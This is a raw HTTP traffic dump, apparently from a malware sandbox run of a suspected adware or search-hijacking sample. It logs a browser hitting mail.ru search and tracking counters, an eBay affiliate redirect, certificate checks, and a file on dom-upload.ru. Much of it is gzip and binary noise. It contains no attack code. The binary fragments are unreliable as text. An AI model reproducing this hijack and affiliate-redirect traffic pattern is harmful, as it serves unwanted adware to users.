Expires: Thu, 05 Mar 2015 09:35:33 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
600a...............r#W.&.....R1....Zr....5SY.B.P...A....p.....$E..j...
...n6.............l.~..W...W..;.n..d.BYe#.d8|...g?..[...;...WkW...V..U
....W7.^1..N..v..w.t.?.e...>.......o7.[[. ............ .Z.>Hg/..
_M.I6._V...f5=......n...l:..7n$m..............G........w...z;.w..d2...
.g.N:.V....Z.!...q'.B..I...w}]....n....e...fL..M.c..v..f.....s........
....i?%.[...j..b..N6||.n.3...'..5f.4..g.9> ...t`.I.g.h.w...._.].}.Q
..]..p.z..>..>.g.l.M[....-....4.......a..w...ZC.....@^.....:.F.8
...........K..>...7....:...7;..a.Mv.y.....|...d...^%.u.....z...kqw 
i7..,.X...Nk.J...g1.Y..U..@/...I.RM.....j:.......E>.b..N.s...*B.B.1
@.L..,.l<..e?...t>.O.q.....vk.j.........]........a..3..s\....[5&
lt;.}/W..N...>.;lu.h.m........Grs...s{..M.g.!......o....>>...
.......'.h......... 2.6...nvkqu..W>....V.M1...i}tY.....? cX..P}6...
j.Gh......................i....Y.-...'Vr;Py...a..u.2.v...|#.__..i.p.f.
}..=....g.ls....]..Q.......U.....v...B...|......o.....Z..J.Y..%.i.|4..
=....zkv.. PDG..e..n...2.9.'#AN,H3....l.d...XZWb....Y0/..e.$..._..u..l
Fn.5...|<........U.-..K@t..ku.Vv.....m....P.h..r..P....x...Hk!.....
N...m..2.......N&..u..v1.F..._...d.U\].P.&.....{Q..ii.9.Vy.....f....U.
..g.*....Z.u.w ..@Sm...et...}.u..,.. o\`w*C)(777..n*.B.w...:`..e.Pf...
..jWUH..C.m..L..s}.....*Db....hf:..........5.w!-.v.Jl.)Z.v..#..^~.u..f
.N.Vj.3...m.Z.A...S.....Y6.&.e........Z..wk......TF.i....).....{O.....
.f......wO.&P7..Q.napW7@1;.h...zo...k.....5.$....`W..\_...4.PI.".KOkX.
c..1..q....~6.f._..].!q..` .t..L...~-...q.........0.8..4)]{q?.@..3<<< skipped >>>

GET /static/web/css/opera_sd_style.css?c1f5832d HTTP/1.1

Host: go.imgsmail.ru

Connection: keep-alive

Accept: text/css,*/*;q=0.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:35:34 GMT

Content-Type: text/css

Last-Modified: Wed, 18 Feb 2015 14:32:46 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Expires: Thu, 05 Mar 2015 09:35:34 GMT

Cache-Control: max-age=864000

Access-Control-Allow-Origin: *

Content-Encoding: gzip
18a............m..r.0...........j.I*^#....a...HK....GH....7.....a...4H
...U...h..v ..A.hN.]v4..&.}...-.IcpF..2..u..v,~T.s}D.]zM#..o.}:79..HVx
0....LN.~>..............0.>)......"f.rM..o=.V...o.e....GP%.mI...
 .>...hN....8.>~O<h......5.\..\...=E^./..8....]...2.[........
....!C^<.T.S...C....\....T...P.....{V.......{9.[.L........>,[R\2
.U..9.^..m...N...-.]......d..4.:gt........gi..d.z..d......|.....p]....
..0..HTTP/1.1 200 OK..Server: nginx..Date: Mon, 23 Feb 2015 09:35:34 G
MT..Content-Type: text/css..Last-Modified: Wed, 18 Feb 2015 14:32:46 G
MT..Transfer-Encoding: chunked..Connection: keep-alive..Expires: Thu, 
05 Mar 2015 09:35:34 GMT..Cache-Control: max-age=864000..Access-Contro
l-Allow-Origin: *..Content-Encoding: gzip..18a............m..r.0......
.....j.I*^#....a...HK....GH....7.....a...4H...U...h..v ..A.hN.]v4..&.}
...-.IcpF..2..u..v,~T.s}D.]zM#..o.}:79..HVx0....LN.~>..............
0.>)......"f.rM..o=.V...o.e....GP%.mI... .>...hN....8.>~O<
h......5.\..\...=E^./..8....]...2.[............!C^<.T.S...C....\...
.T...P.....{V.......{9.[.L........>,[R\2.U..9.^..m...N...-.]......d
..4.:gt........gi..d.z..d......|.....p]......0......

GET /pki/mscorp/crl/msitwww2.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: mscrl.microsoft.com


HTTP/1.1 200 OK

Accept-Ranges: bytes

Cache-Control: max-age=6485

Content-Type: application/pkix-crl

Date: Mon, 23 Feb 2015 09:32:32 GMT

Etag: "db7d2673984dd01:0"

Last-Modified: Sat, 21 Feb 2015 05:37:15 GMT

P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"

Server: ECAcc (fcn/40B2)

VTag: 27931941900000000

X-Cache: HIT

X-Powered-By: ASP.NET

Content-Length: 59435

0..'0......0...*.H........0..1.0...U....US1.0...U....Washington1.0...U
....Redmond1.0...U....Microsoft Corporation1.0...U....Microsoft IT1.0.
..U....Microsoft IT SSL SHA2..150221052711Z..150301054711Z0...02..Z...
;.,k..0R......;..140527155450Z0.0...U.......02..Z...:h..jg.E......:..1
40527155449Z0.0...U.......02..Z...5$.A{.2.......5..140527155449Z0.0...
U.......02..Z...4.....D'Y.....4..140527155449Z0.0...U.......02..Z...2.
a...........2..140527155445Z0.0...U.......02..Z...1.....,.......1..140
527155444Z0.0...U.......02..Z...0.g.<..Q......0..140527155440Z0.0..
.U.......02..Z.../..W........../..140527155439Z0.0...U.......02..Z....
....<...........140527155436Z0.0...U.......02..Z...-d..Z..K>....
.-..140527155434Z0.0...U.......02..Z...,\...<.X......,..14052715543
0Z0.0...U.......02..Z... ..d!.y....... ..140527155428Z0.0...U.......02
..Z...*.v#..?'......*..140527155425Z0.0...U.......02..Z...).!=..6.....
..)..140527155423Z0.0...U.......02..Z...(wG...........(..140527155421Z
0.0...U.......02..Z...'..b..z.W.....'..140527155418Z0.0...U.......02..
Z...&..^/O.(......&..140527155416Z0.0...U.......02..Z...%.....nsc.....
%..140527155414Z0.0...U.......02..Z...$O.rB .2H.....$..140527155411Z0.
0...U.......02..Z...#.,5%..F......#..140527155409Z0.0...U.......02..Z.
.."../_...s....."..140527155407Z0.0...U.......02..Z...!..../.l......!.
.140527155404Z0.0...U.......02..Z... .Y.L_.9...... ..140527155402Z0.0.
..U.......02..Z......#M~.zZ........140527155400Z0.0...U.......02..Z...
...~..].G........140527155358Z0.0...U.......02..Z....>e...X....

<<< skipped >>>

GET /rover/1/711-53200-19255-0/1?icep_ff3=1&pub=5574672411&toolid=10001&campid=5337314645&customid=&ipn=psmain&icep_vectorid=229466&kwid=902099&mtid=824&kw=lg HTTP/1.1

Host: rover.ebay.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 301 Moved Permanently

Server: Apache-Coyote/1.1

RlogId: p4n`rujfudlwc=9un4g65`(7731-14bb5c7229d-0x2d4

Set-Cookie: npii=btpim/154eafa85^cguid/b5c7227e14b0a56bc5332673fe4369d556cc26fd^tguid/b5c7227e14b0a56bc5332673fe4369d656cc26fd^trm/svid=87670270539352984256cc26fd^; Domain=.ebay.com; Expires=Tue, 23-Feb-2016 09:31:41 GMT; Path=/

P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"

Cache-Control: private,no-cache,no-store

Pragma: no-cache

Location: hXXp://VVV.ebay.com?rmvSB=true

Content-Length: 0

Date: Mon, 23 Feb 2015 09:31:41 GMT
HTTP/1.1 301 Moved Permanently..Server: Apache-Coyote/1.1..RlogId: p4n
`rujfudlwc=9un4g65`(7731-14bb5c7229d-0x2d4..Set-Cookie: npi
i=btpim/154eafa85^cguid/b5c7227e14b0a56bc5332673fe4369d556cc26fd^tguid
/b5c7227e14b0a56bc5332673fe4369d656cc26fd^trm/svid=87670270539352984
256cc26fd^; Domain=.ebay.com; Expires=Tue, 23-Feb-2016 09:31:41 GMT; P
ath=/..P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa
 OUR SAMo IND UNI COM NAV INT STA DEM PRE"..Cache-Control: private,no-
cache,no-store..Pragma: no-cache..Location: hXXp://VVV.ebay.com?rmvSB=
true..Content-Length: 0..Date: Mon, 23 Feb 2015 09:31:41 GMT...
...

GET /js/code.js HTTP/1.1

Host: top-fwz1.mail.ru

Connection: keep-alive

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8


HTTP/1.1 200 OK

Server: top.mail.ru/2.1

Date: Mon, 23 Feb 2015 09:35:34 GMT

Expires: Mon, 23 Feb 2015 21:35:34 GMT

X-Content-Type-Options: nosniff

Content-Type: text/javascript

Content-Encoding: gzip

P3P: CP="NOI DSP COR NID CUR PSA OUR NOR"

Set-Cookie: FTID=31YlJd30my1J:1424684134::::; path=/; expires=Wed, 24 Feb 2016 09:35:34 GMT; domain=.mail.ru

Cache-control: max-age=43200, private

Pragma: no-cache

Content-Length: 2108

Connection: keep-alive

Keep-Alive: timeout=60
...........X.s.6....B.t4DMSR...h..q...s.$....n..!...2.J~.....>DJN..
.3........7<........bv...y...$.E..e.cq;.}.......... S2....e..>..
.HJq.4....Z$........C......1.*Oc...x.I..?..3~C.....l'%n.i.-....L0..$..
.6..deKF.4.QXN.Dp..Y.rn{..G..Lk...,..=gD.*.5...`~m.,.Tj.M.c....N...$..
..YL.=&..J.'.....x.:iN..tJ.*.b.k&d(.<VX.}.%c..`.S..>#.2.|--A'...
.>..e...Nwh.B.L.T.4=>..N.c`.fj.\a.-......[Bm..Ss...Y.l......m.w.
>.w.VLs...59../....<..I.cj^.Yw.w2.J.S}.p.9..W.c..^/e.X*.L......d
#w....#...ed..:.9"..._-.(.F~kT..%.7%@.....8.<x.1u.....;A.D3.a.dm..V
`...L....9.....\,.._.^..A.k,.!.4....\..v....X...7.[GqQ.=P\.qe..G.P<
.......h3..L...R.s...~K.y.Z....^8...j.z...b....y7...t.$Al.!.OeI..}....
.......O".UM...xM...r...2..............0.......o....P...j..j..&~z[...M
..y.....b.._E:..,.lmy...vM#.?..._..;Mg......a.}...b2K./...Y....x..j...
..:*... ^8....e..$.m..h.@..&Xp.....1n.. 6._..Fv..._.R.w..].G.3...i.gw7
...t.]O...}.{..66.H..}.............T..k.I.b.I........L.T,.....' .I....
7..wCZ......wv...........#..@.H"...g.w..~.P..}Y.\.?.04|Su.n...b|jyH..O
...)....&{.......#b_...r...>....mPQ..{].......E.g.A.....D..|#.ot.#7
..}........6[....>...nL..C...! 7..e^P...........)0...H.......3O...H
..P%2(.h-..75d.x."S..r......}..cTY.|g-S....B...D...=L...Jo......d...."
.UQ.|.Xe7.4...W........~.q.............%.....:IV.....E..VK......Sy^"`V
..6.Y.3......7C.5l....J.[.\..!S.....}.gI.4=..R...O..!.....)..]....j...
.s ..]..9..9. {(......sW1Cy.....>..D...I%...........Rd= ..GO.`.v[..
..n..b..=......tC....X.}....s...h'<....j....~1h].d..f..J.......<<< skipped >>>

GET /counter?id=631797;;r=;j=true;s=1716*901;d=24;rand=0.2730049511883408 HTTP/1.1

Host: top-fwz1.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: mrcu=E8FE54EAF466748E05E0E7F48AC1; FTID=31YlJd30my1J:1424684134:631797:::


HTTP/1.1 200 OK

Server: top.mail.ru/2.1

Date: Mon, 23 Feb 2015 09:35:35 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

P3P: CP="NOI DSP COR NID CUR PSA OUR NOR"

Set-Cookie: VID=3u5u4k1KJ3nJ00000102141J:; path=/; expires=Wed, 24 Feb 2016 09:35:35 GMT; domain=.mail.ru

Set-Cookie: FTID=0; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:01 GMT; domain=.mail.ru

Cache-control: private, no-cache, no-store, max-age=0

Pragma: no-cache

Content-Length: 43

Connection: keep-alive

Keep-Alive: timeout=60
GIF89a.............!.......,...........D..;....


GET /counter?js=13;id=48844;u=http://go.mail.ru/?osd=1;st=1424684153747;title=ÐŸÐ¾Ð¸ÑÐº Mail.Ru;s=1716*901;vp=1008*756;touch=0;hds=1;flash=;sid=e74b9f5c;ver=60;nt=0/0/1424684151577/////1286/1286/1286/1286/1286//1289/1338/1396/1348/2189/2189/2483///;_=0.026122240349650383 HTTP/1.1

Host: top-fwz1.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: mrcu=E8FE54EAF466748E05E0E7F48AC1; VID=3u5u4k1KJ3nJ00000102141J:


HTTP/1.1 200 OK

Server: top.mail.ru/2.1

Date: Mon, 23 Feb 2015 09:35:35 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

P3P: CP="NOI DSP COR NID CUR PSA OUR NOR"

Set-Cookie: VID=3u5u4k1KJ3nJ00000102141J:; path=/; expires=Wed, 24 Feb 2016 09:35:35 GMT; domain=.mail.ru

Cache-control: private, no-cache, no-store, max-age=0

Pragma: no-cache

Content-Length: 43

Connection: keep-alive

Keep-Alive: timeout=60
GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Server: to
p.mail.ru/2.1..Date: Mon, 23 Feb 2015 09:35:35 GMT..X-Content-Type-Opt
ions: nosniff..Content-Type: image/gif..P3P: CP="NOI DSP COR NID CUR P
SA OUR NOR"..Set-Cookie: VID=3u5u4k1KJ3nJ00000102141J:; path=/; expire
s=Wed, 24 Feb 2016 09:35:35 GMT; domain=.mail.ru..Cache-control: priva
te, no-cache, no-store, max-age=0..Pragma: no-cache..Content-Length: 4
3..Connection: keep-alive..Keep-Alive: timeout=60..GIF89a.............
!.......,...........D..;....


GET /tracker?js=13;id=48844;u=http://go.mail.ru/?osd=1;st=1424684153747;title=ÐŸÐ¾Ð¸ÑÐº Mail.Ru;s=1716*901;vp=1008*756;touch=0;hds=1;flash=;sid=e74b9f5c;ver=60;nt=0/0/1424684151577/////1286/1286/1286/1286/1286//1289/1338/1396/1348/2189/2189/2483/3366/3366/;_=0.3633744779508561;e=RT/load;et=1424684154941 HTTP/1.1

Host: top-fwz1.mail.ru

Connection: keep-alive

Accept: image/webp,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Referer: hXXp://go.mail.ru/?osd=1

Accept-Encoding: gzip, deflate, lzma, sdch

Accept-Language: en-US,en;q=0.8

Cookie: mrcu=E8FE54EAF466748E05E0E7F48AC1; VID=3u5u4k1KJ3nJ00000102141J:; searchuid=2579112161391436322


HTTP/1.1 200 OK

Server: top.mail.ru/2.1

Date: Mon, 23 Feb 2015 09:35:35 GMT

X-Content-Type-Options: nosniff

Content-Type: image/gif

P3P: CP="NOI DSP COR NID CUR PSA OUR NOR"

Set-Cookie: VID=3u5u4k1KJ3nJ00000102141J:; path=/; expires=Wed, 24 Feb 2016 09:35:35 GMT; domain=.mail.ru

Cache-control: private, no-cache, no-store, max-age=0

Pragma: no-cache

Content-Length: 43

Connection: keep-alive

Keep-Alive: timeout=60

GIF89a.............!.......,...........D..;HTTP/1.1 200 OK..Server: to
p.mail.ru/2.1..Date: Mon, 23 Feb 2015 09:35:35 GMT..X-Content-Type-Opt
ions: nosniff..Content-Type: image/gif..P3P: CP="NOI DSP COR NID CUR P
SA OUR NOR"..Set-Cookie: VID=3u5u4k1KJ3nJ00000102141J:; path=/; expire
s=Wed, 24 Feb 2016 09:35:35 GMT; domain=.mail.ru..Cache-control: priva
te, no-cache, no-store, max-age=0..Pragma: no-cache..Content-Length: 4
3..Connection: keep-alive..Keep-Alive: timeout=60..GIF89a.............
!.......,...........D..;....

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=340814, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 08:12:19 GMT

Expires: Fri, 27 Feb 2015 08:12:19 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0081219Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U....:.q..E...0.xa......20150220081219Z....20150227081219Z0...*.H.....
........./Ql[......[d"|...).hW.,5....U.ez.v?R.v&?.r....=..i...'.....V.
h_R.0...|.N.bI.5.b.K.:$K.[B......f.....u$=@.6.GE..J..*C.o!..hD.(<.\
...vC]X.@.r6.B......\.. .,.L..%..p....I.>....).y!...c.K:?....xS7^..
]..# .......2]..U......(...bq..........V>..},^.G................0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEEfSKbCvSoRrx+JDeFk3zmo= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=325996, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 04:07:20 GMT

Expires: Fri, 27 Feb 2015 04:07:20 GMT

Date: Mon, 23 Feb 2015 09:35:37 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0040720Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...G.)..J.k..CxY7.j....20150220040720Z....20150227040720Z0...*.H.....
........x........_......^. .o...:....Hm.<{gt...|%..].5.....R..4s.8.
.u........x....V.....n.:....5..._....B(^..,.). ..........[...I..*..Z.]
....v....g*M9......n......4..._n...0~.,=..-L'h....[MCI.:B...eZ.....c..
...4k.w.SL.......2{}/...s..:.....st....s`.n...t..0Z..M..h....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

HEAD /gosearch3.ico HTTP/1.1

Host: illespi.dom-upload.ru

Accept: */*


HTTP/1.1 200 OK

Server: nginx

Date: Mon, 23 Feb 2015 09:36:13 GMT

Content-Type: image/x-icon

Content-Length: 32038

Last-Modified: Wed, 03 Dec 2014 15:19:53 GMT

Connection: keep-alive

ETag: "547f2a19-7d26"

Accept-Ranges: bytes

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab?15377a6d967eaff9 HTTP/1.1

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Wed, 12 Mar 2014 20:20:10 GMT

If-None-Match: "0b96c77303ecf1:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: ctldl.windowsupdate.com


HTTP/1.1 200 OK

Cache-Control: max-age=604800

Content-Type: application/octet-stream

Last-Modified: Fri, 23 Jan 2015 02:29:11 GMT

Accept-Ranges: bytes

ETag: "803565fb436d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Content-Length: 57591

Date: Mon, 23 Feb 2015 09:31:52 GMT

Connection: keep-alive
MSCF............,...................I.................6Fm. .authroot.s
tl......8..CK...<T...g.v!M.d..f.%d..}K..5......dM*K..J.,%K"...!..=.
k..........{=/....{g.~...............'....6..N....w......(.$.>.7...
........'.....`.bx....^..$.'.^.K.C......<b=J..u....@.....2..e....pr
.....usXq.d.i.jF$.4.........KI.Q........A2m:..E.P|...(.^p..=G|.....m..
....  .6...H.e.....X'...%$r.Y.(..)........|...;...V^r.VM.._*X.I. ..4..
...*.....Y..`.0w.u...c.i.[..-...x..<.8.<.p..,..y.[v.Yn`......!.s
...4e......B...$.,..........w.Pd.)....,..#.%..h...8...`.A...8.i(.!.$/.
=.....i.\X.H......"...a...k...y6....F.._?\*.&..3.AJo.!..`....9....=.p.
u..u....f.f....w...?..S..I.;.....5._...F.f..G?$......."..kq.y'.6tJ.e%.
.G.n.....z<.pX"....1..g."........V:.H.-...!}LM..t..-.y.j&...n{..-.]
H. .....A.O.Xg..B...#.f.-..V@.g..8.....Ov...ET..*.....T...}o._./S..h@$
.....!.@.D....c...A1..#.:?."....1..v.....&G...?O1x6"5.@..$.U...n.J...w
.Y.{..........E.N.&...&.rC..W.....M.........,.e.....&eI(/eSO.B..K...R.
 K...s.@9....Jv.....(..Y./;-..M5.0.H2.y....:...........a.U....%.S.).^.
...1.B..a..=...q...X .B....F.../..../.Z...'..t....C....,.^...N=..t%N|I
C.#.)6...q.E.J.i.E.>....".L........>...Vy.7.jxx......G........._
q.1^..H&.4Z......^.E.K 9.Xg...qO.6%>..T....;n..s.'u.-...=.........p
..p.Rn.........=.......F........d. d.AR.0U..........9b...=N..#....c.Ic
z......u.0............Y.q..b.wYE.......R...s..W....r].....hT....k.g..[
...s.....X..`=zb.>..../..=........J.N.h...(}.5.7. .;..=F..F...'.?..
2...3...=...B..`....{...f.`Kb..@..`Z.0!^8.t..<l.j..lI.P.q.>k<<< skipped >>>

GET /geolocation/ HTTP/1.1

Host: autoupdate.geo.opera.com

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Date: Mon, 23 Feb 2015 09:31:30 GMT

Server: Apache/2.2.16 (Debian)

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Pragma: no-cache

Expires: Thu, 1 Jan 1970 00:00:01 GMT

Keep-Alive: timeout=15, max=63

Connection: Keep-Alive

Transfer-Encoding: chunked

Content-Type: text/x-json; charset=utf-8
27..{"country":"UA","timestamp":1424683890}..0..HTTP/1.1 200 OK..Date:
 Mon, 23 Feb 2015 09:31:30 GMT..Server: Apache/2.2.16 (Debian)..Cache-
Control: no-cache, no-store, must-revalidate, max-age=0..Pragma: no-ca
che..Expires: Thu, 1 Jan 1970 00:00:01 GMT..Keep-Alive: timeout=15, ma
x=63..Connection: Keep-Alive..Transfer-Encoding: chunked..Content-Type
: text/x-json; charset=utf-8..27..{"country":"UA","timestamp":14246838
90}..0......

GET /speeddials/partner/amazon_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/amazon_us/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601650

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /speeddials/partner/booking_com_us HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 302 Found

Server: Apache/2.2.16 (Debian)

Location: hXXp://redir.opera.com/previews/images/booking_com_us/sd.png

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Type: text/plain

Content-Length: 26

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2598601676

Age: 0

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: MISS

..............................

GET /previews/images/twitter_us/sd.png HTTP/1.1

Host: redir.opera.com

Connection: keep-alive

X-Purpose: preview

CH: dw=230, dh=170, dpr=1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36 OPR/27.0.1689.69

Accept-Encoding: gzip, deflate, lzma


HTTP/1.1 200 OK

Server: Apache/2.2.16 (Debian)

Last-Modified: Wed, 11 Feb 2015 11:51:52 GMT

ETag: "787019-b6c-50ecea1134600"

Content-Type: image/png

Content-Length: 2924

Date: Mon, 23 Feb 2015 09:31:38 GMT

X-Varnish: 2724563568 2724489800

Age: 217

Via: 1.1 varnish

Connection: keep-alive

X-Varnish-Cache: HIT

X-Varnish-Cache-Hits: 144
.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e&
lt;...hiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xm
p.did:4905A1941A226811822A85CA614666AF" xmpMM:DocumentID="xmp.did:FE82
4E53BED211E28F85D5EC1B7B836C" xmpMM:InstanceID="xmp.iid:FE824E52BED211
E28F85D5EC1B7B836C" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"&
gt; <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:887021171320681180
83C1680B1A71F7" stRef:documentID="xmp.did:4905A1941A226811822A85CA6146
66AF"/> </rdf:Description> </rdf:RDF> </x:xmpmeta>
; <?xpacket end="r"?>u..h....PLTE...............................
.............................................................. .."..#.
